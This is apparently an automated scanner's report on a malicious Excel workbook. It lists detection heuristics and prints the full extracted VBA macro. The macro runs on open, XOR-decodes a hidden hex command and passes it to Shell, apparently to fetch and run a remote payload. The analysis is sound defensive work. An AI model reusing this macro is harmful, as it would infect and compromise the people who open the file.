MALICIOUS
130
Risk Score
Heuristics 5
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell (o½°¼ìò·±·³™ì•œ¶È¾OÕ™™•¾œŸ§§OD³îìàÕ§¹ñ€‚´…i§o½Y‘§¹Y™Œw¬ª) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Public Sub Workbook_Open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3386 bytes |
SHA-256: 848e2e71c218d22d14c5b3ef64ae890fc6107f4bf973b1a45fcdc3a8b7d003b5 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public Sub Workbook_Open()
Dim Z×°Ÿ³ÇŸº³ì•¾™™¹¾y††Déºà½Y´–Œ•…¤°¹œ½½•¶°i¥–ņ•¼³±œ§†XØ As String
Dim ¤i•ÌÕ•m••»¾OÕœàì¼Õñöyñº½ñ½œø°´¹§†È¼±•¾·à¬™†¾¾ÌO×B€•â¾™½ As String
Dim é–¤´–·•±Õ•ñ°î±º³ñ„Â¼é¹§àœ±•¾â¥•Œ•´½ÇNZ……½ä¹§øN»§´‚Ÿ°ñ± As String
Dim o½°¼ìò·±·³™ì•œ¶È¾OÕ™™•¾œŸ§§OD³îìàÕ§¹ñ€‚´…i§o½Y‘§¹Y™Œw¬ª As String
Dim cc As String
Dim •§‚î…mX§•ìÇî¹î•™‚§y‚¾Ÿâ½w•wÃAŸ™DÕÌñ¾Y¹•–×§ä™§Zؼ½¾½à…‚ As String
•§‚î…mX§•ìÇî¹î•™‚§y‚¾Ÿâ½w•wÃAŸ™DÕÌñ¾Y¹•–×§ä™§Zؼ½¾½à…‚ = "intXOintXOrValue1rVintXOrValue1alue1"
o½°¼ìò·±·³™ì•œ¶È¾OÕ™™•¾œŸ§§OD³îìàÕ§¹ñ€‚´…i§o½Y‘§¹Y™Œw¬ª = •§‚î…mX§•ìÇî¹î•™‚§y‚¾Ÿâ½w•wÃAŸ™DÕÌñ¾Y¹•–×§ä™§Zؼ½¾½à…‚ + (Replace(a("XXXXXXX", "3B353C78773B782837782000782F3D2A782000782B303D3434763D203D78753D203D3B2D782000782C313736283734313B21783A2128392B2B7878200078750F7810313C3C3D3678753B3778200078353539363C7870363D2F75373A323D3B2C780B212B2C3D3576163D2C760F3D3A1B34313D362C71761C372F363437393C1E31343D707F302C2C2862777728372B29312C76363D2C770C0C77606D68696B6D763D203D7F747C3D362E620C3D3528737F04363D782000782F3E3178200078343D761D203D7F716370163D2F75173A323D3B2C78753B782000783735780B303D3434767820007819282834313B392C31373671760B303D34341D203D3B2D2C3D707C3D362E620C3D782000783528737F04363D2F3E7820007831343D761D203D7F71"), " xX " + cc, ""))
o½°¼ìò·±·³™ì•œ¶È¾OÕ™™•¾œŸ§§OD³îìàÕ§¹ñ€‚´…i§o½Y‘§¹Y™Œw¬ª = Replace(o½°¼ìò·±·³™ì•œ¶È¾OÕ™™•¾œŸ§§OD³îìàÕ§¹ñ€‚´…i§o½Y‘§¹Y™Œw¬ª, •§‚î…mX§•ìÇî¹î•™‚§y‚¾Ÿâ½w•wÃAŸ™DÕÌñ¾Y¹•–×§ä™§Zؼ½¾½à…‚, "")
Shell (o½°¼ìò·±·³™ì•œ¶È¾OÕ™™•¾œŸ§§OD³îìàÕ§¹ñ€‚´…i§o½Y‘§¹Y™Œw¬ª)
End Sub
Public Function a(CodeKey As String, DataIn As String) As String
Dim lonDataPtr As Long
Dim strDataOut As String
Dim intXOrValue1 As Integer
Dim intXOrValue2 As Integer
For lonDataPtr = 1 To (Len(DataIn) / 2)
intXOrValue1 = Val("&H" & (Mid$(DataIn, (2 * lonDataPtr) - 1, 2)))
intXOrValue2 = Asc(Mid$(CodeKey, ((lonDataPtr Mod Len(CodeKey)) + 1), 1))
strDataOut = strDataOut + Chr(intXOrValue1 Xor intXOrValue2)
Next lonDataPtr
a = strDataOut
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 15872 bytes |
SHA-256: a3b7735144f16243ecbb11276ee7309945b5e80fa7ab85b1821793ea72040363 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.